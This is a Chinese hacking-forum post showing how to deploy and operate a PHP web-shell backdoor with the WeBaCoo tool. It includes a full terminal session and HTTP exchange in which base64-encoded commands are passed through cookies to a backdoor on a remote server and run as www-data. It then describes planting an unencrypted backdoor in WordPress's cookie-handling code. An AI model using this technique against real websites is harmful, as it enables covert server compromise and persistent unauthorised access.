切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
313 php WEBSHELL B[复制链接]
发表于 2012-10-12 23:51:01 | 显示全部楼层 |!read_mode!
一个正常的例子,生成后门


PHP BACKDOOR 已经被编码成一串远古文字=.=
上传到WEB服务器 用BS抓包看看他如何工作,当然买不起BS的穷人只能看Verbose了,一个流程如下:
  1. root@Dis9:/pen/door/WeBaCoo# ./webacoo.pl -t -u http://brk.fuzzexp.org/back.php -v 2

  2.         WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
  3.         Copyright (C) 2011-2012 Anestis Bechtsoudis
  4.         { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

  5. [+] Connecting to remote server as...
  6. uid=33(www-data) gid=33(www-data) groups=33(www-data)

  7. [*] Type 'load' to use an extension module.
  8. [*] Type ':<cmd>' to run local OS commands.
  9. [*] Type 'exit' to quit terminal.

  10. webacoo$ id
  11. *** Request HTTP Header ***
  12. GET http://brk.fuzzexp.org/back.php HTTP/1.1
  13. Host: brk.fuzzexp.org:80
  14. Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
  15. Connection: Close
  16. Cookie: cm=aWQ=; cn=M-cookie; cp=bWr#

  17. *** Response HTTP Header ***
  18. HTTP/1.1 200 OK
  19. Date: Wed, 26 Sep 2012 19:48:04 GMT
  20. Server: Apache/2.2.16 (Ubuntu)
  21. X-Powered-By: PHP/5.3.3-1ubuntu9.10
  22. Set-Cookie: M-cookie=bWr#dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkKbWr#
  23. Vary: Accept-Encoding
  24. Content-Length: 0
  25. Connection: close
  26. Content-Type: text/html

  27. *** Response HTTP Data ***


  28. *** Command Output ***
  29. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  30. webacoo$
复制代码
看这里 看这里




这样就方便了,手动够早一个包试试:




返回结果解密后是我们想要的数据 来试试插入一个网页程序中,生成一个不进行加密的后门




插入到取得WEBSHELL的程序中,拿WP为例子 找到COOKIES的相关函数 插入




构造一个GET提交包 如下:




看来成功了 用WeBaCoo 链接








附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-26 09:49

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部